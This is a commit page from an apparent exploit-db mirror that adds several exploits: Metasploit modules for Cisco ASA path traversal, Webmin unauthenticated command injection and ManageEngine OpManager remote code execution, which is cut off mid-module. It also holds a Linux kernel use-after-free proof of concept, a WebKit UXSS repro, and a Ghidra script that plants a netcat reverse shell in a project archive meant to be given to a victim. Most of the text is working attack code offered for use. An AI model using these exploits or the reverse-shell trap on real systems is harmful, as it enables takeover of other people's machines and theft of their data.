bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2019-08-13

Browse source 
17 changes to exploits/shellcodes

VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow
Linux - Use-After-Free Reads in show_numa_stats()
WebKit - UXSS via XSLT and Nested Document Replacements

Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution
ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution (Metasploit)
ManageEngine Application Manager 14.2 - Privilege Escalation / Remote Command Execution (Metasploit)
ManageEngine OpManager 12.4x - Unauthenticated Remote Command Execution (Metasploit)
Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)
BSI Advance Hotel Booking System 2.0 - 'booking_details.php Persistent Cross-Site Scripting
Cisco Adaptive Security Appliance - Path Traversal (Metasploit)
UNA 10.0.0 RC1 - 'polyglot.php' Persistent Cross-Site Scripting
Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticketreply.php' SQL Injection
Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticket.php' Arbitrary File Deletion
osTicket 1.12 - Persistent Cross-Site Scripting via File Upload
osTicket 1.12 - Formula Injection
osTicket 1.12 - Persistent Cross-Site Scripting
Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection

Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (162 bytes)
Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)
Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes)
Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Null-Free Shellcode (151 bytes)
Linux/x64 - Egghunter (0x50905090) Shellcode (18 bytes)

Linux/x64 - execve() + XOR/NOT/DIV Encoded Shellcode (54 bytes)
Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)
Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)
Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (hack) + Polymorphic Shellcode (122 bytes)
Linux/x64 - Reverse (127.0.0.1:4444/TCP) Shell + Password (hack) + Polymorphic Shellcode (135 bytes)

Linux/x64 - execve() Stack + Polymorphic Shellcode (47 bytes)
This commit is contained in:
Offensive Security 2019-08-13 05:02:31 +00:00
parent d82ffc9cd0
commit a32e028b88
19 changed files with 2113 additions and 7 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

115
exploits/hardware/webapps/47220.rb Executable file
View file

@ -0,0 +1,115 @@
require 'msf/core'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "Cisco Adaptive Security Appliance - Path Traversal",
'Description' => %q{
Cisco Adaptive Security Appliance - Path Traversal (CVE-2018-0296)
A security vulnerability in Cisco ASA that would allow an attacker to view sensitive system information without authentication by using directory traversal techniques.
Google Dork:inurl:+CSCOE+/logon.html
},
'License' => MSF_LICENSE,
'Author' =>
[
'Yassine Aboukir', #Initial discovery
'Angelo Ruwantha @h3llwings' #msf module
],
'References' =>
[
['EDB', '44956'],
['URL', 'https://www.exploit-db.com/exploits/44956/']
],
'Arch' => ARCH_CMD,
'Compat' =>
{
'PayloadType' => 'cmd'
},
'Platform' => ['unix','linux'],
'Targets' =>
[
['3000 Series Industrial Security Appliance (ISA)
ASA 1000V Cloud Firewall
ASA 5500 Series Adaptive Security Appliances
ASA 5500-X Series Next-Generation Firewalls
ASA Services Module for Cisco Catalyst 6500 Series Switches and Cisco 7600 Series Routers
Adaptive Security Virtual Appliance (ASAv)
Firepower 2100 Series Security Appliance
Firepower 4100 Series Security Appliance
Firepower 9300 ASA Security Module
FTD Virtual (FTDv)', {}]
],
'Privileged' => false,
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'Ex: https://vpn.example.com', '/']),
OptString.new('SSL', [true, 'set it as true', 'true']),
OptString.new('RPORT', [true, '443', '443']),
], self.class)
end
def run
uri = target_uri.path
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/'),
})
if res && res.code == 200 && res.body.include?("{'name'")
print_good("#{peer} is Vulnerable")
print_status("Directory Index ")
print_good(res.body)
res_dir = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=%2bCSCOE%2b'),
})
res_users = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'),
})
userIDs=res_users.body.scan(/[0-9]\w+/).flatten
print_status("CSCEO Directory ")
print_good(res_dir.body)
print_status("Active Session(s) ")
print_status(res_users.body)
x=0
begin
print_status("Getting User(s)")
while (x<=userIDs.length)
users = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, '/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/'+userIDs[x]),
})
grab_username=users.body.scan(/user:\w+/)
nonstr=grab_username
if (!nonstr.nil? && nonstr!="")
print_good("#{nonstr}")
end
x=x+1
end
rescue
print_status("Complete")
end
else
print_error("safe")
return Exploit::CheckCode::Safe
end
end
end

265
exploits/linux/dos/47236.c Normal file
View file

@ -0,0 +1,265 @@
/*
On NUMA systems, the Linux fair scheduler tracks information related to NUMA
faults in task_struct::numa_faults and task_struct::numa_group. Both of these
have broken object lifetimes.
Since commit 82727018b0d3 ("sched/numa: Call task_numa_free() from do_execve()",
first in v3.13), ->numa_faults is freed not only when the last reference to the
task_struct is gone, but also after successful execve(). However,
show_numa_stats() (reachable through /proc/$pid/sched) locklessly reads data
from ->numa_faults (use-after-free read) and prints it to a userspace buffer.
To test this, I used a QEMU VM with the following NUMA configuration:
-m 8192 -smp cores=4 -numa node,nodeid=0 -numa node,nodeid=1
Test code is attached; it takes a while before it triggers the bug since the
race window is pretty small.
KASAN report:
============================
[ 909.461282] ==================================================================
[ 909.464502] BUG: KASAN: use-after-free in show_numa_stats+0x99/0x160
[ 909.465250] Read of size 8 at addr ffff8880ac8f8f00 by task numa_uaf/18471
[ 909.466167] CPU: 0 PID: 18471 Comm: numa_uaf Not tainted 5.2.0-rc7 #443
[ 909.466877] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
[ 909.467751] Call Trace:
[ 909.468072] dump_stack+0x7c/0xbb
[ 909.468413] ? show_numa_stats+0x99/0x160
[ 909.468879] print_address_description+0x6e/0x2a0
[ 909.469419] ? show_numa_stats+0x99/0x160
[ 909.469828] ? show_numa_stats+0x99/0x160
[ 909.470292] __kasan_report+0x149/0x18d
[ 909.470683] ? show_numa_stats+0x99/0x160
[ 909.471137] kasan_report+0xe/0x20
[ 909.471533] show_numa_stats+0x99/0x160
[ 909.471988] proc_sched_show_task+0x6ae/0x1e60
[ 909.472467] sched_show+0x6a/0xa0
[ 909.472836] seq_read+0x197/0x690
[ 909.473264] vfs_read+0xb2/0x1b0
[ 909.473616] ksys_pread64+0x74/0x90
[ 909.474034] do_syscall_64+0x5d/0x260
[ 909.474975] entry_SYSCALL_64_after_hwframe+0x49/0xbe
[ 909.475512] RIP: 0033:0x7f6f57742987
[ 909.475878] Code: 35 39 a4 09 00 48 8d 3d d1 a4 09 00 e8 52 77 f4 ff 66 90 48 8d 05 79 7d 0d 00 49 89 ca 8b 00 85 c0 75 10 b8 11 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 59 c3 41 55 49 89 cd 41 54 49 89 d4 55 48 89
[ 909.477905] RSP: 002b:00005565fc10d108 EFLAGS: 00000246 ORIG_RAX: 0000000000000011
[ 909.478684] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f6f57742987
[ 909.479393] RDX: 0000000000001000 RSI: 00005565fc10d120 RDI: 0000000000000005
[ 909.480254] RBP: 00005565fc10e130 R08: 00007f6f57657740 R09: 00007f6f57657740
[ 909.481037] R10: 0000000000000000 R11: 0000000000000246 R12: 00005565fbf0b1f0
[ 909.481821] R13: 00007ffe60338770 R14: 0000000000000000 R15: 0000000000000000
[ 909.482744] Allocated by task 18469:
[ 909.483135] save_stack+0x19/0x80
[ 909.483475] __kasan_kmalloc.constprop.3+0xa0/0xd0
[ 909.483957] task_numa_fault+0xff2/0x1d30
[ 909.484414] __handle_mm_fault+0x94f/0x1320
[ 909.484887] handle_mm_fault+0x7e/0x100
[ 909.485323] __do_page_fault+0x2bb/0x610
[ 909.485722] async_page_fault+0x1e/0x30
[ 909.486355] Freed by task 18469:
[ 909.486687] save_stack+0x19/0x80
[ 909.487027] __kasan_slab_free+0x12e/0x180
[ 909.487497] kfree+0xd8/0x290
[ 909.487805] __do_execve_file.isra.41+0xf1e/0x1140
[ 909.488316] __x64_sys_execve+0x4f/0x60
[ 909.488706] do_syscall_64+0x5d/0x260
[ 909.489144] entry_SYSCALL_64_after_hwframe+0x49/0xbe
[ 909.490121] The buggy address belongs to the object at ffff8880ac8f8f00
which belongs to the cache kmalloc-128 of size 128
[ 909.491564] The buggy address is located 0 bytes inside of
128-byte region [ffff8880ac8f8f00, ffff8880ac8f8f80)
[ 909.492919] The buggy address belongs to the page:
[ 909.493445] page:ffffea0002b23e00 refcount:1 mapcount:0 mapping:ffff8880b7003500 index:0xffff8880ac8f8d80
[ 909.494419] flags: 0x1fffc0000000200(slab)
[ 909.494836] raw: 01fffc0000000200 ffffea0002cec780 0000000900000009 ffff8880b7003500
[ 909.495633] raw: ffff8880ac8f8d80 0000000080150011 00000001ffffffff 0000000000000000
[ 909.496451] page dumped because: kasan: bad access detected
[ 909.497291] Memory state around the buggy address:
[ 909.497775] ffff8880ac8f8e00: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb
[ 909.498546] ffff8880ac8f8e80: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
[ 909.499319] >ffff8880ac8f8f00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
[ 909.500034] ^
[ 909.500429] ffff8880ac8f8f80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
[ 909.501150] ffff8880ac8f9000: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
[ 909.501942] ==================================================================
[ 909.502712] Disabling lock debugging due to kernel taint
============================
->numa_group is a refcounted reference with RCU semantics, but the RCU helpers
are used inconsistently. In particular, show_numa_stats() reads from
p->numa_group->faults with no protection against concurrent updates.
There are also various other places across the scheduler that use ->numa_group
without proper protection; e.g. as far as I can tell,
sched_tick_remote()->task_tick_fair()->task_tick_numa()->task_scan_start()
reads from p->numa_group protected only by the implicit read-side critical
section that spinlocks currently imply by disabling preemption, and with no
protection against the pointer unexpectedly becoming NULL.
I am going to send suggested fixes in a minute, but I think the approach for
->numa_group might be a bit controversial. The approach I'm taking is:
- For ->numa_faults, just wipe the statistics instead of freeing them.
- For ->numa_group, use proper RCU accessors everywhere.
Annoyingly, if one of the RCU accessors detects a problem (with
CONFIG_PROVE_LOCKING=y), it uses printk, and if the wrong runqueue lock is held
at that point, a deadlock might happen, which isn't great. To avoid that, the
second patch adds an ugly hack in printk that detects potential runqueue
deadlocks if lockdep is on. I'm not sure how you all are going to feel about
that one - maybe it's better to just leave it out, or do something different
there? I don't know...
I'm sending the suggested patches off-list for now; if you want me to resend
them publicly, just say so.
*/
#define _GNU_SOURCE
#include <errno.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <numaif.h>
#include <sched.h>
#include <err.h>
#include <time.h>
#include <fcntl.h>
#include <signal.h>
#include <sys/prctl.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/uio.h>
#include <sys/syscall.h>
#include <linux/userfaultfd.h>
int sched_fd;
int get_scan_seq(void) {
char buf[0x1000];
ssize_t buflen = pread(sched_fd, buf, sizeof(buf)-1, 0);
if (buflen == -1) err(1, "read sched");
buf[buflen] = '\0';
char *p = strstr(buf, "numa_scan_seq");
if (!p) errx(1, "no numa_scan_seq");
*strchrnul(p, '\n') = '\0';
p = strpbrk(p, "0123456789");
if (!p) errx(1, "no numa_scan_seq");
return atoi(p);
}
void reexec(char *arg0) {
char *argv[] = {arg0, NULL};
execvp("/proc/self/exe", argv);
err(1, "reexec");
}
volatile int uaf_child_ready = 0;
static int sfd_uaf(void *fd_) {
int fd = (int)(long)fd_;
/*
prctl(PR_SET_PDEATHSIG, SIGKILL);
if (getppid() == 1) raise(SIGKILL);
*/
while (1) {
char buf[0x1000];
ssize_t res = pread(fd, buf, sizeof(buf)-1, 0);
if (res == -1) {
if (errno == ESRCH) _exit(0);
err(1, "pread");
}
buf[res] = '\0';
puts(buf);
uaf_child_ready = 1;
}
}
int main(int argc, char **argv) {
if (strcmp(argv[0], "die") == 0) {
_exit(0);
}
sched_fd = open("/proc/self/sched", O_RDONLY|O_CLOEXEC);
if (sched_fd == -1) err(1, "open sched");
// allocate two pages at the lowest possible virtual address so that the first periodic memory fault is scheduled on the first page
char *page = mmap((void*)0x1000, 0x2000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0);
if (page == MAP_FAILED) err(1, "mmap");
*page = 'a';
// handle the second page with uffd
int ufd = syscall(__NR_userfaultfd, 0);
if (ufd == -1) err(1, "userfaultfd");
struct uffdio_api api = { .api = UFFD_API, .features = 0 };
if (ioctl(ufd, UFFDIO_API, &api)) err(1, "uffdio_api");
struct uffdio_register reg = {
.mode = UFFDIO_REGISTER_MODE_MISSING,
.range = { .start = (__u64)page+0x1000, .len = 0x1000 }
};
if (ioctl(ufd, UFFDIO_REGISTER, &reg))
err(1, "uffdio_register");
// make sure that the page is on the CPU-less NUMA node
unsigned long old_nodes = 0x1;
unsigned long new_nodes = 0x2;
if (migrate_pages(0, sizeof(unsigned long), &old_nodes, &new_nodes)) err(1, "migrate_pages");
// trigger userfault in child
pid_t uffd_child = fork();
if (uffd_child == -1) err(1, "fork");
if (uffd_child == 0) {
prctl(PR_SET_PDEATHSIG, SIGKILL);
struct iovec iov = { .iov_base = (void*)0x1fff, .iov_len = 2 };
process_vm_readv(getppid(), &iov, 1, &iov, 1, 0);
err(1, "process_vm_readv returned");
}
sleep(1);
int ini_seq = get_scan_seq();
printf("initial scan_seq: %d\n", ini_seq);
if (ini_seq) reexec("m");
// wait for a migration
time_t start_time = time(NULL);
while (1) {
if (time(NULL) > start_time + 30) {
puts("no migration detected!");
reexec("m");
}
int cur_seq = get_scan_seq();
if (cur_seq != 0) {
printf("new scan_seq: %d\n", cur_seq);
goto migration_done;
}
}
migration_done:
printf("migration done after %d seconds\n", (int)(time(NULL)-start_time));
while (1) {
pid_t pid = fork();
if (pid == -1) err(1, "fork");
if (pid == 0) {
static char uaf_stack[1024*1024];
static char uaf_stack2[1024*1024];
int sfd = open("/proc/self/sched", O_RDONLY);
if (sfd == -1) err(1, "open sched");
pid_t uaf_child = clone(sfd_uaf, uaf_stack+sizeof(uaf_stack), CLONE_FILES|CLONE_VM, (void*)(long)sfd);
if (uaf_child == -1) err(1, "clone uaf_child");
uaf_child = clone(sfd_uaf, uaf_stack2+sizeof(uaf_stack2), CLONE_FILES|CLONE_VM, (void*)(long)sfd);
if (uaf_child == -1) err(1, "clone uaf_child");
while (!uaf_child_ready) __builtin_ia32_pause();
*(volatile char *)page = 'b';
reexec("die");
}
int status;
if (wait(&status) != pid) err(1, "wait");
}
}

60
exploits/linux/local/47231.py Executable file
View file

@ -0,0 +1,60 @@
import os
import inspect
import argparse
import shutil
from shutil import copyfile
print("")
print("")
print("################################################")
print("")
print("------------------CVE-2019-13623----------------")
print("")
print("################################################")
print("")
print("-----------------Ghidra-Exploit-----------------")
print("--Tested version: Ghidra Linux version <= 9.0.4-")
print("------------------------------------------------")
print("")
print("################################################")
print("")
print("----------Exploit by: Etienne Lacoche-----------")
print("---------Contact Twitter: @electr0sm0g----------")
print("")
print("------------------Discovered by:----------------")
print("---------https://blog.fxiao.me/ghidra/----------")
print("")
print("--------Exploit tested on Ubuntu 18.04----------")
print("-----------------Dependency: zip----------------")
print("")
print("################################################")
print("")
print("")
parser = argparse.ArgumentParser()
parser.add_argument("file", help="Path to input export .gar file",default=1)
parser.add_argument("ip", help="Ip to nc listener",default=1)
parser.add_argument("port", help="Port to nc listener",default=1)
args = parser.parse_args()
if args.ip and args.port and args.file:
rootDirURL=os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe())))
path = "../Ghidra/Features/Decompiler/os/linux64/decompile"
os.system("mkdir -p ../Ghidra/Features/Decompiler/os/linux64/")
os.system("echo 'rm -f x; mknod x p && nc "+args.ip+" "+args.port+" 0<x | /bin/bash 1>x' > decompile")
os.system("chmod +x decompile")
copyfile("decompile",path)
copyfile(args.file,rootDirURL+"/"+"project.gar")
os.system("zip -q project.gar ../Ghidra/Features/Decompiler/os/linux64/decompile")
os.system("echo 'To fully export this archive, place project.gar to GHIDRA_INSTALL_DIR root path and open it with Restore Project at Ghidra.' > README_BEFORE_OPEN_GAR_FILE")
os.system("zip -q project.zip README_BEFORE_OPEN_GAR_FILE")
os.system("zip -q project.zip project.gar")
os.system("rm decompile README_BEFORE_OPEN_GAR_FILE")
os.system("rm project.gar")
print("You can now share project.zip and start your local netcat listener.")
print("")
print("Project.gar must be placed and opened by victim at GHIDRA_INSTALL_DIR")
print("root path for payload execution.")
print("")

125
exploits/linux/remote/47230.rb Executable file
View file

@ -0,0 +1,125 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Webmin 1.920 Unauthenticated RCE',
'Description' => %q(
This module exploits an arbitrary command execution vulnerability in Webmin
1.920 and prior versions. If the password change module is turned on, the unathenticated user
can execute arbitrary commands with root privileges.
/////// This 0day has been published at DEFCON-AppSec Village. ///////
),
'Author' => [
'AkkuS <Özkan Mustafa Akkuş>' # Discovery & PoC & Metasploit module @ehakkus
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-'],
['URL', 'https://www.pentest.com.tr']
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd'
}
},
'DefaultOptions' =>
{
'RPORT' => 10000,
'SSL' => false,
'PAYLOAD' => 'cmd/unix/reverse_python'
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [['Webmin <= 1.910', {}]],
'DisclosureDate' => 'May 16 2019',
'DefaultTarget' => 0)
)
register_options [
OptString.new('TARGETURI', [true, 'Base path for Webmin application', '/'])
]
end
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
##
# Target and input verification
##
def check
# check passwd change priv
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "password_change.cgi"),
'headers' =>
{
'Referer' => "#{peer}/session_login.cgi"
},
'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1"
})
if res && res.code == 200 && res.body =~ /Failed/
res = send_request_cgi(
{
'method' => 'POST',
'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
'headers' =>
{
'Referer' => "#{peer}/session_login.cgi"
},
'data' => "user=root&pam=&expired=2&old=AkkuS%7cdir%20&new1=akkuss&new2=akkuss"
})
if res && res.code == 200 && res.body =~ /password_change.cgi/
return CheckCode::Vulnerable
else
return CheckCode::Safe
end
else
return CheckCode::Safe
end
end
##
# Exploiting phase
##
def exploit
unless Exploit::CheckCode::Vulnerable == check
fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
end
command = payload.encoded
print_status("Attempting to execute the payload...")
handler
res = send_request_cgi(
{
'method' => 'POST',
'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
'ctype' => 'application/x-www-form-urlencoded',
'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
'headers' =>
{
'Referer' => "#{peer}/session_login.cgi"
},
'data' => "user=root&pam=&expired=2&old=AkkuS%7c#{command}%20&new1=akkuss&new2=akkuss"
})
end
end

138
exploits/multiple/dos/47237.txt Normal file
View file

@ -0,0 +1,138 @@
VULNERABILITY DETAILS
https://trac.webkit.org/browser/webkit/trunk/Source/WebCore/xml/XSLTProcessor.cpp#L66
```
Ref<Document> XSLTProcessor::createDocumentFromSource(const String& sourceString,
const String& sourceEncoding, const String& sourceMIMEType, Node* sourceNode, Frame* frame)
{
Ref<Document> ownerDocument(sourceNode->document());
bool sourceIsDocument = (sourceNode == &ownerDocument.get());
String documentSource = sourceString;
RefPtr<Document> result;
if (sourceMIMEType == "text/plain") {
result = XMLDocument::createXHTML(frame, sourceIsDocument ? ownerDocument->url() : URL());
transformTextStringToXHTMLDocumentString(documentSource);
} else
result = DOMImplementation::createDocument(sourceMIMEType, frame, sourceIsDocument ? ownerDocument->url() : URL());
// Before parsing, we need to save & detach the old document and get the new document
// in place. We have to do this only if we're rendering the result document.
if (frame) {
[...]
frame->setDocument(result.copyRef());
}
auto decoder = TextResourceDecoder::create(sourceMIMEType);
decoder->setEncoding(sourceEncoding.isEmpty() ? UTF8Encoding() : TextEncoding(sourceEncoding), TextResourceDecoder::EncodingFromXMLHeader);
result->setDecoder(WTFMove(decoder));
result->setContent(documentSource);
```
https://trac.webkit.org/browser/webkit/trunk/Source/WebCore/page/Frame.cpp#L248
```
void Frame::setDocument(RefPtr<Document>&& newDocument)
{
ASSERT(!newDocument || newDocument->frame() == this);
if (m_documentIsBeingReplaced) // ***1***
return;
m_documentIsBeingReplaced = true;
[...]
if (m_doc && m_doc->pageCacheState() != Document::InPageCache)
m_doc->prepareForDestruction(); // ***2***
m_doc = newDocument.copyRef();
```
`setDocument` calls `Document::prepareForDestruction`, which might trigger JavaScript execution via
a nested frame's "unload" event handler. Therefore the `m_documentIsBeingReplaced` flag has been
introduced to avoid reentrant calls. The problem is that by the time `setDocument` is called,
`newDocument` might already have a reference to a `Frame` object, and if the method returns early,
that reference will never get cleared by subsequent navigations. It's not possible to trigger
document replacement inside `setDocument` via a regular navigation request or a 'javascript:' URI
load; however, an attacker can use an XSLT transformation for that.
When the attacker has an extra document attached to a frame, they can navigate the frame to a
cross-origin page and issue a form submission request to a 'javascript:' URI using the extra
document to trigger UXSS.
VERSION
WebKit revision 245321.
It should affect the stable branch as well, but the test case crashes Safari 12.1.1 (14607.2.6.1.1).
REPRODUCION CASE
repro.html:
```
<body>
<script>
createFrame = doc => doc.body.appendChild(document.createElement('iframe'));
pi = document.createProcessingInstruction('xml-stylesheet',
'type="text/xml" href="stylesheet.xml"');
cache_frame = createFrame(document);
cache_frame.contentDocument.appendChild(pi);
setTimeout(() => {
victim_frame = createFrame(document);
child_frame_1 = createFrame(victim_frame.contentDocument);
child_frame_1.contentWindow.onunload = () => {
victim_frame.src = 'javascript:""';
try {
victim_frame.contentDocument.appendChild(document.createElement('html')).
appendChild(document.createElement('body'));
} catch { }
child_frame_2 = createFrame(victim_frame.contentDocument);
child_frame_2.contentWindow.onunload = () => {
doc = victim_frame.contentDocument;
doc.write('foo');
doc.firstChild.remove();
doc.appendChild(pi);
doc.appendChild(doc.createElement('root'));
doc.close();
}
}
victim_frame.src = 'javascript:""';
if (child_frame_1.xslt_script_run) {
victim_frame.src = 'http://example.com/';
victim_frame.onload = () => {
form = corrupted_doc.createElement('form');
form.action = 'javascript:alert(document.body.innerHTML)';
form.submit();
}
}
}, 2000);
</script>
</body>
```
stylesheet.xml:
```
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="/">
<html>
<body>
<script>
<![CDATA[
document.body.lastChild.xslt_script_run = true;
]]>
</script>
<iframe src="javascript:top.corrupted_doc = frameElement.ownerDocument; frameElement.remove();"></iframe>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
```
CREDIT INFORMATION
Sergei Glazunov of Google Project Zero

408
exploits/multiple/remote/47227.rb Executable file
View file

@ -0,0 +1,408 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "ManageEngine OpManager 12.4x - Privilege Escalation / Remote Command Execution",
'Description' => %q(
This module exploits sqli and command injection vulnerability in the OpManager v12.4.034 and prior versions.
Module creates a new admin user with SQLi (MSSQL/PostgreSQL) and provides privilege escalation.
Therefore low authority user can gain the authority of "system" on the server.
It uploads malicious file using the "Execute Program Action(s)" feature of Application Manager Plugin.
/////// This 0day has been published at DEFCON-AppSec Village. ///////
),
'License' => MSF_LICENSE,
'Author' =>
[
'AkkuS <Özkan Mustafa Akkuş>', # Discovery & PoC & Metasploit module @ehakkus
],
'References' =>
[
[ 'URL', 'http://pentest.com.tr/exploits/DEFCON-ManageEngine-OpManager-v12-4-Privilege-Escalation-Remote-Command-Execution.html' ]
],
'DefaultOptions' =>
{
'WfsDelay' => 60,
'RPORT' => 8060,
'SSL' => false,
'PAYLOAD' => 'generic/shell_reverse_tcp'
},
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
},
'Platform' => ['unix', 'win'],
'Targets' =>
[
[ 'Windows Target',
{
'Platform' => ['win'],
'Arch' => ARCH_CMD,
}
],
[ 'Linux Target',
{
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' =>
{
'PayloadType' => 'cmd',
}
}
}
]
],
'DisclosureDate' => '10 August 2019 //DEFCON',
'DefaultTarget' => 0))
register_options(
[
OptString.new('USERNAME', [true, 'OpManager Username']),
OptString.new('PASSWORD', [true, 'OpManager Password']),
OptString.new('TARGETURI', [true, 'Base path for ME application', '/'])
],self.class)
end
def check_platform(host, port, cookie)
res = send_request_cgi(
'rhost' => host,
'rport' => port,
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'showTile.do'),
'cookie' => cookie,
'vars_get' => {
'TileName' => '.ExecProg',
'haid' => 'null',
}
)
if res && res.code == 200 && res.body.include?('createExecProgAction')
@dir = res.body.split('name="execProgExecDir" maxlength="200" size="40" value="')[1].split('" class=')[0]
if @dir =~ /:/
platform = Msf::Module::Platform::Windows
else
platform = Msf::Module::Platform::Unix
end
else
fail_with(Failure::Unreachable, 'Connection error occurred! DIR could not be detected.')
end
file_up(host, port, cookie, platform, @dir)
end
def file_up(host, port, cookie, platform, dir)
if platform == Msf::Module::Platform::Windows
filex = ".bat"
else
if payload.encoded =~ /sh/
filex = ".sh"
elsif payload.encoded =~ /perl/
filex = ".pl"
elsif payload.encoded =~ /awk 'BEGIN{/
filex = ".sh"
elsif payload.encoded =~ /python/
filex = ".py"
elsif payload.encoded =~ /ruby/
filex = ".rb"
else
fail_with(Failure::Unknown, 'Payload type could not be checked!')
end
end
@fname= rand_text_alpha(9 + rand(3)) + filex
data = Rex::MIME::Message.new
data.add_part('./', nil, nil, 'form-data; name="uploadDir"')
data.add_part(payload.encoded, 'application/octet-stream', nil, "form-data; name=\"theFile\"; filename=\"#{@fname}\"")
res = send_request_cgi({
'rhost' => host,
'rport' => port,
'method' => 'POST',
'data' => data.to_s,
'agent' => 'Mozilla',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'cookie' => cookie,
'uri' => normalize_uri(target_uri, "Upload.do")
})
if res && res.code == 200 && res.body.include?('icon_message_success')
print_good("#{@fname} malicious file has been uploaded.")
create_exec_prog(host, port, cookie, dir, @fname)
else
fail_with(Failure::Unknown, 'The file could not be uploaded!')
end
end
def create_exec_prog(host, port, cookie, dir, fname)
@display = rand_text_alphanumeric(7)
res = send_request_cgi(
'method' => 'POST',
'rhost' => host,
'rport' => port,
'uri' => normalize_uri(target_uri.path, 'adminAction.do'),
'cookie' => cookie,
'vars_post' => {
'actions' => '/showTile.do?TileName=.ExecProg&haid=null',
'method' => 'createExecProgAction',
'id' => 0,
'displayname' => @display,
'serversite' => 'local',
'choosehost' => -2,
'abortafter' => 5,
'command' => fname,
'execProgExecDir' => dir,
'cancel' => 'false'
}
)
if res && res.code == 200 && res.body.include?('icon_message_success')
actionid = res.body.split('actionid=')[1].split("','710','350','250','200')")[0]
print_status("Transactions completed. Attempting to get a session...")
exec(host, port, cookie, actionid)
else
fail_with(Failure::Unreachable, 'Connection error occurred!')
end
end
def exec(host, port, cookie, action)
send_request_cgi(
'method' => 'GET',
'rhost' => host,
'rport' => port,
'uri' => normalize_uri(target_uri.path, 'common', 'executeScript.do'),
'cookie' => cookie,
'vars_get' => {
'method' => 'testAction',
'actionID' => action,
'haid' => 'null'
}
)
end
def peer
"#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
end
def print_status(msg='')
super("#{peer} - #{msg}")
end
def print_error(msg='')
super("#{peer} - #{msg}")
end
def print_good(msg='')
super("#{peer} - #{msg}")
end
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'apiclient', 'ember', 'Login.jsp'),
)
# For this part the build control will be placed.
# For now, AppManager plugin control is sufficient.
if res && res.code == 200 && res.body.include?('Logout.do?showPreLogin=false')
return Exploit::CheckCode::Vulnerable
else
return Exploit::CheckCode::Safe
end
end
def app_login
res = send_request_cgi(
'method' => 'GET',
